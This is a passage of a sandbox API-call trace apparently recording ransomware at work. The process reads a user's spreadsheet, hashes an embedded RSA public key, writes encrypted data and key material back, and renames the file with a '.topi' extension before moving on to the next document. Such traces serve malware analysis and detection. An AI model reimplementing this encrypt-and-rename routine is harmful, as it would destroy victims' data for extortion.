lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.147] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.147] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xd8d4, lpOverlapped=0x0) returned 1 [0096.148] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.148] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.148] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.148] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.148] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.149] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.149] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.149] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.149] GetLastError () returned 0x0 [0096.149] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.149] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.149] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.149] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.149] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd8d0) returned 0x9a06a00 [0096.149] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02558 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97f8 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a025a0 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9810 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9840 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9858 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.150] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9840 | out: hHeap=0x680000) returned 1 [0096.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9858 | out: hHeap=0x680000) returned 1 [0096.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9858 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9840 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9858 | out: hHeap=0x680000) returned 1 [0096.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9840 | out: hHeap=0x680000) returned 1 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.151] GetCurrentThreadId () returned 0x8c4 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7800 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.151] GetCurrentThreadId () returned 0x8c4 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.151] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.151] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9840 [0096.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9858 [0096.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9828 [0096.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9870 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9840 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9840 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9840 | out: hHeap=0x680000) returned 1 [0096.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9870 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9858 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9828 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9810 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a025a0 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.155] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xd8cf, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xd8cf, lpOverlapped=0x0) returned 1 [0096.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.155] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd8d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.155] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0096.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0096.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.156] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0096.156] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.156] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.156] CloseHandle (hObject=0x6a8) returned 1 [0096.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.157] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0096.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.157] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\qe7r.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\qe7r.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lt6ZzNEQACj\\qe7r.xls.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lt6zzneqacj\\qe7r.xls.topi")) returned 1 [0096.158] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.158] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.158] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.159] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31532f8 | out: hHeap=0x680000) returned 1 [0096.159] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x546d3f30, ftCreationTime.dwHighDateTime=0x1d5bc7c, ftLastAccessTime.dwLowDateTime=0x357a4ae0, ftLastAccessTime.dwHighDateTime=0x1d5b5b6, ftLastWriteTime.dwLowDateTime=0x357a4ae0, ftLastWriteTime.dwHighDateTime=0x1d5b5b6, nFileSizeHigh=0x0, nFileSizeLow=0x11003, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wNZ Bd.ods", cAlternateFileName="WNZBD~1.ODS")) returned 1 [0096.159] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.159] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x31532f8 [0096.159] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0096.159] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS 